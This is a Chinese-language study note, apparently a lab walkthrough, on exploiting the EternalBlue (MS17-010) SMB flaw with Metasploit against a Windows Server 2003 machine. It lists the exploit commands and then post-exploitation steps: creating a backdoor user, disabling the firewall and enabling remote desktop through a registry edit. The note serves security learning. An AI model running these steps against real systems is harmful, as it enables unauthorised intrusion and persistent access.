本文爲學習筆記,僅限學習交流。
不得利用、從事危害國家或人民安全、榮譽和利益等活動。
請參閱《中華人民共和國網絡安全法》
永恆之藍是利用Windows操作系統445端口存在的漏洞進行傳播,並具有自我複製、主動傳播的特性。
基於Windows網絡共享協議進行攻擊傳播的蠕蟲惡意代碼
流程簡介:1、啓動:msfconsole
2、查看可測試漏洞模塊:search ms17
3、使用模塊進行測試:use +模塊名稱
4、添加IP:set rhost ip (查看模塊架構:show options)
5、測試:exploit (或 run)
拿到權限:shell
一、測試準備:
目標機:server 2003
攻擊機:kali
利用Nmap掃描IP ,查看已開啓端口
發現445端口,嘗試進行滲透測試:
二、漏洞測試
1、啓動 msfconsole 命令:msfconsole
(重啓數據庫 命令:service postgresql start)
2、查看合適測試這個漏洞的模塊
命令:search ms17
3、使用模塊進行測試 use + 模塊名稱 (最後一個)
命令:use exploit/windows/smb/ms17_010_psesec
查看攻擊模塊框架:
命令: show options
4、set rhost 添加目標IP
命令:set rhost 192.168.0.13
5、 exploit 開始進行測試
命令: exploit
成功拿到權限
三、Kali操控server 2003
1、添加用戶net user 用戶名 密碼 /add
命令:net user amy 123456 /add
(添加用戶到組:net localgroup 「power user」 用戶名 /add)
查看本地用戶信息:
命令: Net user
確認添加成功
2、關閉防火牆
命令:netsh firewall set opmode mode=disable
查看防火牆狀態:
netsh firewall show state
3、查看開啓的端口
命令:netstat -ano
開啓3389端口
命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
查看 3389 端口
命令:netstat -aon |findstr 「3389」
四、server 2003驗證
End!